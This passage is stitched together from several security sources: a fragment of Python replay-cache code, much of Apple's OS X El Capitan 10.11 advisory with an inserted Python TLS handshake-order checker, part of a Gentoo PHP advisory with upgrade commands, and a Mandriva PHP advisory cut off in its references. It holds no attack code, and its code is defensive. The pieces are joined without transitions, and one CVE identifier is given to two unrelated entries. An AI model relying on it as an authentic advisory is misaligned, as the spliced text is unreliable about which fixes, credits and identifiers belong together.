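            _, key = heapq.heappop(self.expiry_heap)
            self.seen.discard(key)

    def check(self, client, ctime, cusec):
        """Return True if the authenticator is fresh and not seen before.

        client: client principal name, e.g. "alice@EXAMPLE.COM" (constructed)
        ctime:  client timestamp in seconds (authenticator ctime field)
        cusec:  microsecond part (authenticator cusec field)
        """
        t = self.now()
        self._evict(t)
        # Freshness: outside the skew window the authenticator is rejected
        # whether or not it was seen, so the cache never has to remember an
        # entry for longer than the window.
        if abs(t - ctime) > self.skew:
            return False
        key = (client, ctime, cusec)
        if key in self.seen:
            return False          # replay of an authenticator seen before
        self.seen.add(key)
        # Keep the entry until its ctime can no longer be inside the window.
        heapq.heappush(self.expiry_heap, (ctime + self.skew, key))
        return True


if __name__ == "__main__":
    # Constructed demonstration: first presentation accepted, replay refused.
    rc = ReplayCache()
    now = int(time.time())
    print(rc.check("alice@EXAMPLE.COM", now, 1))   # True
    print(rc.check("alice@EXAMPLE.COM", now, 1))   # False
```

The freshness check and the eviction bound are deliberately tied to the same window: an entry is dropped only once any re-presentation of it would already fail on timestamp, so shrinking the skew also shrinks the memory the cache needs.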
ICU
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in ICU
Description: Multiple vulnerabilities existed in ICU versions prior
to 53.1.0. These issues were addressed by updating ICU to version
55.1.
CVE-ID
CVE-2014-8146
CVE-2014-8147
CVE-2015-5922
Install Framework Legacy
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to gain root privileges
Description: A restriction issue existed in the Install private
framework containing a privileged executable. This issue was
addressed by removing the executable.
CVE-ID
CVE-2015-5888 : Apple
Intel Graphics Driver
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: Multiple memory corruption issues existed in the Intel
Graphics Driver. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-5830 : Yuki MIZUNO (@mzyy94)
CVE-2015-5877 : Camillus Gerard Cai
IOAudioFamily
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in IOAudioFamily that led to the
disclosure of kernel memory content. This issue was addressed by
permuting kernel pointers.
CVE-ID
CVE-2015-5864 : Luca Todesco
IOGraphics
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: Multiple memory corruption issues existed in the
kernel. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5871 : Ilja van Sprundel of IOActive
CVE-2015-5872 : Ilja van Sprundel of IOActive
CVE-2015-5873 : Ilja van Sprundel of IOActive
CVE-2015-5890 : Ilja van Sprundel of IOActive
IOGraphics
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to determine kernel
memory layout
Description: An issue existed in IOGraphics which could have led to
the disclosure of kernel memory layout. This issue was addressed
through improved memory management.
CVE-ID
CVE-2015-5865 : Luca Todesco
IOHIDFamily
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: Multiple memory corruption issues existed in
IOHIDFamily. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-5866 : Apple
CVE-2015-5867 : moony li of Trend Micro
IOStorageFamily
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to read kernel memory
Description: A memory initialization issue existed in the kernel.
This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5863 : Ilja van Sprundel of IOActive
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: Multiple memory corruption issues existed in the
Kernel. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5868 : Cererdlong of Alibaba Mobile Security Team
CVE-2015-5896 : Maxime Villard of m00nbsd
CVE-2015-5903 : CESG
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local process can modify other processes without
entitlement checks
Description: An issue existed where root processes using the
processor_set_tasks API were allowed to retrieve the task ports of
other processes. This issue was addressed through additional
entitlement checks.
CVE-ID
CVE-2015-5882 : Pedro Vilaca, working from original research by
Ming-chieh Pan and Sung-ting Tsai; Jonathan Levin
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may control the value of stack cookies
Description: Multiple weaknesses existed in the generation of user
space stack cookies. These issues were addressed through improved
generation of stack cookies.
CVE-ID
CVE-2013-3951 : Stefan Esser
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to launch denial of service attacks
on targeted TCP connections without knowing the correct sequence
number
Description: An issue existed in xnu's validation of TCP packet
headers. This issue was addressed through improved TCP packet header
validation.
CVE-ID
CVE-2015-5879 : Jonathan Looney
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a local LAN segment may disable IPv6 routing
Description: An insufficient validation issue existed in the
handling of IPv6 router advertisements that allowed an attacker to
set the hop limit to an arbitrary value. This issue was addressed by
enforcing a minimum hop limit.
CVE-ID
CVE-2015-5869 : Dennis Spindel Ljungmark
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed that led to the disclosure of kernel
memory layout. This was addressed through improved initialization of
kernel memory structures.
CVE-ID
CVE-2015-5842 : beist of grayhash
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in debugging interfaces that led to
the disclosure of memory content. This issue was addressed by
sanitizing output from debugging interfaces.
CVE-ID
CVE-2015-5870 : Apple
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to cause a system denial of service
Description: A state management issue existed in debugging
functionality. This issue was addressed through improved validation.
CVE-ID
CVE-2015-5902 : Sergi Alvarez (pancake) of NowSecure Research Team
libc
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2014-8611 : Adrian Chadd and Alfred Perlstein of Norse
Corporation
libpthread
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5899 : Lufeng Li of Qihoo 360 Vulcan Team
libxpc
Available for: Mac OS X v10.6.8 and later
Impact: Many SSH connections could cause a denial of service
Description: launchd had no limit on the number of processes that
could be started by a network connection. This issue was addressed by
limiting the number of SSH processes to 40.
CVE-ID
CVE-2015-5881 : Apple
Login Window
Available for: Mac OS X v10.6.8 and later
Impact: The screen lock may not engage after the specified time
period
Description: An issue existed with captured display locking. The
issue was addressed through improved lock handling.
CVE-ID
CVE-2015-5833 : Carlos Moreira, Rainer Dorau of rainer dorau
informationsdesign, Chris Nehren, Kai Takac, Hans Douma, Toni
Vaahtera, and an anonymous researcher
lukemftpd
Available for: Mac OS X v10.6.8 and later
Impact: A remote attacker may be able to deny service to the FTP
server
Description: A glob-processing issue existed in tnftpd. This issue
was addressed through improved glob validation.
CVE-ID
CVE-2015-5917 : Maksymilian Arciemowicz of cxsecurity.com
Mail
Available for: Mac OS X v10.6.8 and later
Impact: Printing an email may leak sensitive user information
Description: An issue existed in Mail which bypassed user
preferences when printing an email. This issue was addressed through
improved user preference enforcement.
CVE-ID
CVE-2015-5881 : Owen DeLong of Akamai Technologies, Noritaka Kamiya,
Dennis Klein from Eschenburg, Germany, Jeff Hammett of Systim
Technology Partners
Mail
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a privileged network position may be able to
intercept attachments of S/MIME-encrypted e-mail sent via Mail Drop
Description: An issue existed in handling encryption parameters for
large email attachments sent via Mail Drop. The issue is addressed by
no longer offering Mail Drop when sending an encrypted e-mail.
CVE-ID
CVE-2015-5884 : John McCombs of Integrated Mapping Ltd
Multipeer Connectivity
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to observe unprotected
multipeer data
Description: An issue existed in convenience initializer handling in
which encryption could be actively downgraded to a non-encrypted
session. This issue was addressed by changing the convenience
initializer to require encryption.
CVE-ID
CVE-2015-5851 : Alban Diquet (@nabla_c0d3) of Data Theorem
NetworkExtension
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to determine kernel
memory layout
Description: An uninitialized memory issue in the kernel led to the
disclosure of kernel memory content. This issue was addressed through
improved memory initialization.
CVE-ID
CVE-2015-5831 : Maxime Villard of m00nbsd
Notes
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to leak sensitive user information
Description: An issue existed in parsing links in the Notes
application. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5878 : Craig Young of Tripwire VERT, an anonymous researcher
Notes
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to leak sensitive user information
Description: A cross-site scripting issue existed in parsing text by
the Notes application. This issue was addressed through improved
input validation.
CVE-ID
CVE-2015-5875 : xisigr of Tencent's Xuanwu LAB (www.tencent.com)
OpenSSH
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in OpenSSH
Description: Multiple vulnerabilities existed in OpenSSH versions
prior to 6.9. These issues were addressed by updating OpenSSH to
version 6.9.
CVE-ID
CVE-2014-2532
OpenSSL
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in OpenSSL
Description: Multiple vulnerabilities existed in OpenSSL versions
prior to 0.9.8zg. These were addressed by updating OpenSSL to version
0.9.8zg.
CVE-ID
CVE-2015-0286
CVE-2015-0287
procmail
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in procmail
Description: Multiple vulnerabilities existed in procmail versions
prior to 3.22. These issues were addressed by removing procmail.
CVE-ID
CVE-2014-3618
remote_cmds
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with root
privileges
Description: An issue existed in the usage of environment variables
by the rsh binary. This issue was addressed by dropping setuid
privileges from the rsh binary.
CVE-ID
CVE-2015-5889 : Philip Pettersson
removefile
Available for: Mac OS X v10.6.8 and later
Impact: Processing malicious data may lead to unexpected application
termination
Description: An overflow fault existed in the checkint division
routines. This issue was addressed with improved division routines.
CVE-ID
CVE-2015-5840 : an anonymous researcher
Ruby
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in Ruby
Description: Multiple vulnerabilities existed in Ruby versions prior
to 2.0.0p645. These were addressed by updating Ruby to version
2.0.0p645.
CVE-ID
CVE-2014-8080
CVE-2014-8090
CVE-2015-1855
Security
Available for: Mac OS X v10.6.8 and later
Impact: The lock state of the keychain may be incorrectly displayed
to the user
Description: A state management issue existed in the way keychain
lock status was tracked. This issue was addressed through improved
state management.
CVE-ID
CVE-2015-5915 : Peter Walz of University of Minnesota, David Ephron,
Eric E. Lawrence, Apple
Security
Available for: Mac OS X v10.6.8 and later
Impact: A trust evaluation configured to require revocation checking
may succeed even if revocation checking fails
Description: The kSecRevocationRequirePositiveResponse flag was
specified but not implemented. This issue was addressed by
implementing the flag.
CVE-ID
CVE-2015-5894 : Hannes Oud of kWallet GmbH
Security
Available for: Mac OS X v10.6.8 and later
Impact: A remote server may prompt for a certificate before
identifying itself
Description: Secure Transport accepted the CertificateRequest
message before the ServerKeyExchange message. This issue was
addressed by requiring the ServerKeyExchange first.
CVE-ID
CVE-2015-5887 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine
Delignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of
INRIA Paris-Rocquencourt, and Cedric Fournet and Markulf Kohlweiss of
Microsoft Research, Pierre-Yves Strub of IMDEA Software Institute
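The ordering check that the fix above describes, as an added example rather than Apple's Secure Transport code: a small Python model of the TLS 1.2 server flight (RFC 5246, section 7.3) that only accepts a CertificateRequest once the ServerKeyExchange required by an ephemeral (ECDHE/DHE) cipher suite has arrived. The message names, the OpenSSL-style cipher-suite naming and the sample flights are assumptions constructed for the illustration; it models certificate-based suites only, not anonymous or PSK exchanges.

```python
"""Order check for the TLS 1.2 server flight (RFC 5246, section 7.3).

Added example, not Apple's Secure Transport implementation. A client that
tracks handshake state this way rejects a CertificateRequest that arrives
before the ServerKeyExchange of an ephemeral key exchange, instead of
accepting messages in whatever order the server sends them. Only
certificate-based suites are modelled (an assumption of this example).
"""
from enum import Enum, auto


class Msg(Enum):
    SERVER_HELLO = auto()
    CERTIFICATE = auto()
    SERVER_KEY_EXCHANGE = auto()
    CERTIFICATE_REQUEST = auto()
    SERVER_HELLO_DONE = auto()


class HandshakeError(Exception):
    """Raised when a message arrives out of the order the RFC prescribes."""


def needs_server_key_exchange(cipher_suite):
    """Ephemeral (EC)DHE suites carry their parameters in ServerKeyExchange;
    static RSA key transport has no such message. Suite names follow the
    OpenSSL-style convention, assumed here for the example."""
    return cipher_suite.startswith(("ECDHE-", "DHE-"))


def allowed_next(state, ske_required):
    """Set of messages that may follow `state` (None = nothing received yet)."""
    if state is None:
        return {Msg.SERVER_HELLO}
    if state is Msg.SERVER_HELLO:
        return {Msg.CERTIFICATE}
    if state is Msg.CERTIFICATE:
        # With an ephemeral suite the ServerKeyExchange is mandatory and must
        # come next: a CertificateRequest here is the out-of-order case.
        if ske_required:
            return {Msg.SERVER_KEY_EXCHANGE}
        return {Msg.CERTIFICATE_REQUEST, Msg.SERVER_HELLO_DONE}
    if state is Msg.SERVER_KEY_EXCHANGE:
        return {Msg.CERTIFICATE_REQUEST, Msg.SERVER_HELLO_DONE}
    if state is Msg.CERTIFICATE_REQUEST:
        return {Msg.SERVER_HELLO_DONE}
    return set()  # nothing may follow ServerHelloDone in this flight


def validate_server_flight(flight, cipher_suite):
    """Return True when `flight` is in RFC order for `cipher_suite`,
    otherwise raise HandshakeError naming the offending message."""
    ske_required = needs_server_key_exchange(cipher_suite)
    state = None
    for msg in flight:
        if msg not in allowed_next(state, ske_required):
            prev = state.name if state else "start of flight"
            raise HandshakeError(f"unexpected {msg.name} after {prev}")
        state = msg
    if state is not Msg.SERVER_HELLO_DONE:
        raise HandshakeError("flight ended before ServerHelloDone")
    return True


def is_valid(flight, cipher_suite):
    """Boolean wrapper around validate_server_flight."""
    try:
        return validate_server_flight(flight, cipher_suite)
    except HandshakeError:
        return False


if __name__ == "__main__":
    # Constructed flights: the RFC order and the out-of-order variant.
    good = [Msg.SERVER_HELLO, Msg.CERTIFICATE, Msg.SERVER_KEY_EXCHANGE,
            Msg.CERTIFICATE_REQUEST, Msg.SERVER_HELLO_DONE]
    bad = [Msg.SERVER_HELLO, Msg.CERTIFICATE, Msg.CERTIFICATE_REQUEST,
           Msg.SERVER_KEY_EXCHANGE, Msg.SERVER_HELLO_DONE]
    print(is_valid(good, "ECDHE-RSA-AES128-GCM-SHA256"))  # True
    print(is_valid(bad, "ECDHE-RSA-AES128-GCM-SHA256"))   # False
```

The point of keying the allowed successors on the negotiated suite is that the same CertificateRequest position is legal for static RSA and illegal for ECDHE; a checker that only looks at the message sequence without the suite cannot tell the two apart.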
SMB
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5891 : Ilja van Sprundel of IOActive
SMB
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in SMBClient that led to the
disclosure of kernel memory content. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2015-5893 : Ilja van Sprundel of IOActive
SQLite
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in SQLite v3.8.5
Description: Multiple vulnerabilities existed in SQLite v3.8.5.
These issues were addressed by updating SQLite to version 3.8.10.2.
CVE-ID
CVE-2015-3414
CVE-2015-3415
CVE-2015-3416
Telephony
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker can place phone calls without the user's
knowledge when using Continuity
Description: An issue existed in the authorization checks for
placing phone calls. This issue was addressed through improved
authorization checks.
CVE-ID
CVE-2015-3785 : Dan Bastone of Gotham Digital Science
Terminal
Available for: Mac OS X v10.6.8 and later
Impact: Maliciously crafted text could mislead the user in Terminal
Description: Terminal did not handle bidirectional override
characters in the same way when displaying text and when selecting
text. This issue was addressed by suppressing bidirectional override
characters in Terminal.
CVE-ID
CVE-2015-5883 : an anonymous researcher
tidy
Available for: Mac OS X v10.6.8 and later
Impact: Visiting a maliciously crafted website may lead to arbitrary
code execution
Description: Multiple memory corruption issues existed in tidy.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5522 : Fernando Munoz of NULLGroup.com
CVE-2015-5523 : Fernando Munoz of NULLGroup.com
Time Machine
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may gain access to keychain items
Description: An issue existed in backups by the Time Machine
framework. This issue was addressed through improved coverage of Time
Machine backups.
CVE-ID
CVE-2015-5854 : Jonas Magazinius of Assured AB
Note: OS X El Capitan 10.11 includes the security content of
Safari 9: https://support.apple.com/kb/HT205265.
OS X El Capitan 10.11 may be obtained from the Mac App Store:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - http://gpgtools.org
iQIcBAEBCAAGBQJWDB2wAAoJEBcWfLTuOo7t0sYP/2L3JOGPkHH8XUh2YHpu5qaw
S5F2v+SRpWleKQBVsGZ7oA8PV0rBTzEkzt8K1tNxYmxEqL9f/TpRiGoforn89thO
/hOtmVOfUcBjPZ4XKwMVzycfSMC9o6LxWTLEKDVylE+F+5jkXafOC9QaqD11dxX6
QhENkpS1BwrKhyaSVxEcgBQtZM9aTsVdZ78rTCb9XTn6gDnvs8NfIQquFOnaQT54
YJ36e5UcUsnyBIol+yGDbC3ZEhzSVIGE5/8/NFlFfRXLgnJArxD8lqz8WdfU9fop
hpT/dDqqAdYbRcW1ihcG1haiNHgP9yQCY5jRNfttb+Tc/kIi/QmPkEO0QS8Ygt/O
c3sUbNulr1LCinymFVwx16CM1DplGS/GmBL18BAEBnL6yi9tEhYDynZWLSEa37VR
8q802rXRSF10Wct9/kEeR4HgY/1k0KK/4Uddm3c0YyOU21ya7NAhoHGwmDa9g11r
N1TniOK8tPiCGjRNOJwuF6DKxD9L3Fv44bVlxAarGUGYkICqzaNS+bgKI1aQNahT
fJ91x5uKD4+L9v9c5slkoDIvWqIhO9oyuxgnmC5GstkwFplFXSOklLkTktjLGNn1
nJq8cPnZ/3E1RXTEwVhGljYw5pdZHNx98XmLomGrPqVlZfjGURK+5AXdf2pOlt2e
g6jld/w5tPuCFhGucE7Z
=XciV
-----END PGP SIGNATURE-----
Background
==========
PHP is a widely-used general-purpose scripting language that is
especially suited for Web development and can be embedded into HTML.
Please review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All PHP 5.4 users should upgrade to the latest 5.5 stable branch, as
PHP 5.4 is now masked in Portage:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/php-5.5.33"
All PHP 5.5 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/php-5.5.33"
All PHP 5.6 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/php-5.6.19"
References
==========
[ 1 ] CVE-2013-6501
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6501
[ 2 ] CVE-2014-9705
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9705
[ 3 ] CVE-2014-9709
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9709
[ 4 ] CVE-2015-0231
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0231
[ 5 ] CVE-2015-0273
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0273
[ 6 ] CVE-2015-1351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1351
[ 7 ] CVE-2015-1352
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1352
[ 8 ] CVE-2015-2301
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2301
[ 9 ] CVE-2015-2348
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2348
[ 10 ] CVE-2015-2783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2783
[ 11 ] CVE-2015-2787
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2787
[ 12 ] CVE-2015-3329
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3329
[ 13 ] CVE-2015-3330
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3330
[ 14 ] CVE-2015-4021
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4021
[ 15 ] CVE-2015-4022
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4022
[ 16 ] CVE-2015-4025
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4025
[ 17 ] CVE-2015-4026
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4026
[ 18 ] CVE-2015-4147
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4147
[ 19 ] CVE-2015-4148
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4148
[ 20 ] CVE-2015-4642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4642
[ 21 ] CVE-2015-4643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4643
[ 22 ] CVE-2015-4644
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4644
[ 23 ] CVE-2015-6831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6831
[ 24 ] CVE-2015-6832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6832
[ 25 ] CVE-2015-6833
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6833
[ 26 ] CVE-2015-6834
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6834
[ 27 ] CVE-2015-6835
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6835
[ 28 ] CVE-2015-6836
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6836
[ 29 ] CVE-2015-6837
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6837
[ 30 ] CVE-2015-6838
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6838
[ 31 ] CVE-2015-7803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7803
[ 32 ] CVE-2015-7804
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7804
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201606-10
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2016 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2015:080
http://www.mandriva.com/en/support/security/
_______________________________________________________________________
Package : php
Date : March 28, 2015
Affected: Business Server 2.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities have been discovered and corrected in php:
It was discovered that the file utility contains a flaw in the handling
of indirect magic rules in the libmagic library, which leads to an
infinite recursion when trying to determine the file type of certain
files (CVE-2014-1943).
A flaw was found in the way the file utility determined the type of
Portable Executable (PE) format files, the executable format used on
Windows. A malicious PE file could cause the file utility to crash or,
potentially, execute arbitrary code (CVE-2014-2270).
The BEGIN regular expression in the awk script detector in
magic/Magdir/commands in file before 5.15 uses multiple wildcards
with unlimited repetitions, which allows context-dependent attackers
to cause a denial of service (CPU consumption) via a crafted ASCII
file that triggers a large amount of backtracking, as demonstrated
via a file with many newline characters (CVE-2013-7345).
PHP FPM in PHP versions before 5.4.28 and 5.5.12 uses a UNIX domain
socket with world-writable permissions by default, which allows any
local user to connect to it and execute PHP scripts as the apache user
(CVE-2014-0185).
A flaw was found in the way file's Composite Document Files (CDF)
format parser handled CDF files with many summary info entries.
The cdf_unpack_summary_info() function unnecessarily repeatedly read
the info from the same offset. This led to many file_printf() calls in
cdf_file_property_info(), which caused file to use an excessive amount
of CPU time when parsing a specially-crafted CDF file (CVE-2014-0237).
A flaw was found in the way file parsed property information from
Composite Document Files (CDF) files. A property entry with 0 elements
triggers an infinite loop (CVE-2014-0238).
The unserialize() function in PHP before 5.4.30 and 5.5.14 has a Type
Confusion issue related to the SPL ArrayObject and SPLObjectStorage
Types (CVE-2014-3515).
It was discovered that PHP is vulnerable to a heap-based buffer
overflow in the DNS TXT record parsing. A malicious server or
man-in-the-middle attacker could possibly use this flaw to execute
arbitrary code as the PHP interpreter if a PHP application uses
dns_get_record() to perform a DNS query (CVE-2014-4049).
A flaw was found in the way file parsed property information from
Composite Document Files (CDF) files, where the mconvert() function did
not correctly compute the truncated pascal string size (CVE-2014-3478).
Multiple flaws were found in the way file parsed property information
from Composite Document Files (CDF) files, due to insufficient boundary
checks on buffers (CVE-2014-0207, CVE-2014-3479, CVE-2014-3480,
CVE-2014-3487).
The phpinfo() function in PHP before 5.4.30 and 5.5.14 has a Type
Confusion issue that can cause it to leak arbitrary process memory
(CVE-2014-4721).
file before 5.19 does not properly restrict the amount of data read
during a regex search, which allows remote attackers to cause a
denial of service (CPU consumption) via a crafted file that triggers
backtracking during processing of an awk rule, due to an incomplete
fix for CVE-2013-7345 (CVE-2014-3538).
NOTE: this vulnerability exists because of an incomplete fix
for CVE-2012-1571 (CVE-2014-3587).
NOTE: this issue exists because of an incomplete fix for CVE-2014-4049
(CVE-2014-3597).
An integer overflow flaw in PHP's unserialize() function was
reported. If unserialize() were used on untrusted data, this
issue could lead to a crash or potentially information disclosure
(CVE-2014-3669).
A heap corruption issue was reported in PHP's exif_thumbnail()
function. A specially-crafted JPEG image could cause the PHP
interpreter to crash or, potentially, execute arbitrary code
(CVE-2014-3670).
If client-supplied input was passed to PHP's cURL client as a URL to
download, it could return local files from the server due to improper
handling of null bytes (PHP#68089).
An out-of-bounds read flaw was found in file's donote() function in the
way the file utility determined the note headers of an ELF file. This
could possibly lead to a crash of the file executable (CVE-2014-3710).
A use-after-free flaw was found in PHP unserialize(). An untrusted
input could cause PHP interpreter to crash or, possibly, execute
arbitrary code when processed using unserialize() (CVE-2014-8142).
sapi/cgi/cgi_main.c in the CGI component in PHP before 5.5.21, when
mmap is used to read a .php file, does not properly consider the
mapping's length during processing of an invalid file that begins
with a # character and lacks a newline character, which causes an
out-of-bounds read and might allow remote attackers to obtain sensitive
information from php-cgi process memory by leveraging the ability to
upload a .php file or trigger unexpected code execution if a valid
PHP script is present in memory locations adjacent to the mapping
(CVE-2014-9427).
Free called on an uninitialized pointer in php-exif in PHP before
5.5.21 (CVE-2015-0232).
The readelf.c source file has been removed from PHP's bundled copy of
file's libmagic, eliminating exposure to denial of service issues in
ELF file parsing such as CVE-2014-8116, CVE-2014-8117, CVE-2014-9620
and CVE-2014-9621 in PHP's fileinfo module.
S. Paraschoudis discovered that PHP incorrectly handled memory in
the enchant binding.
Taoguang Chen discovered that PHP incorrectly handled unserializing
objects.
It was discovered that PHP incorrectly handled memory in the phar
extension. NOTE: this vulnerability exists because of an incomplete
fix for CVE-2014-8142 (CVE-2015-0231).
An integer overflow flaw, leading to a heap-based buffer overflow,
was found in the way libzip, which is embedded in PHP, processed
certain ZIP archives. If an attacker were able to supply a specially
crafted ZIP archive to an application using libzip, it could cause
the application to crash or, possibly, execute arbitrary code
(CVE-2015-2331).
It was discovered that the PHP opcache component incorrectly handled
memory.
It was discovered that the PHP PostgreSQL database extension
incorrectly handled certain pointers.
PHP contains a bundled copy of the file utility's libmagic library,
so it was vulnerable to the libmagic issues. The libzip packages
have been patched to address the CVE-2015-2331 flaw.
A bug in the php zip extension that could cause a crash has been fixed
(mga#13820).
Additionally, the jsonc and timezonedb packages have been upgraded to
the latest versions, and the PECL packages that require it have been
rebuilt for php-5.5.23.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7345
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0185
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0207
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0237
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0238
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1943
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2270
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3478
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3479
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3480
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3487
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3515
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3538
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3587
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3597
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3669
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3670
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3710
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4049
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4670
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4698
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4721
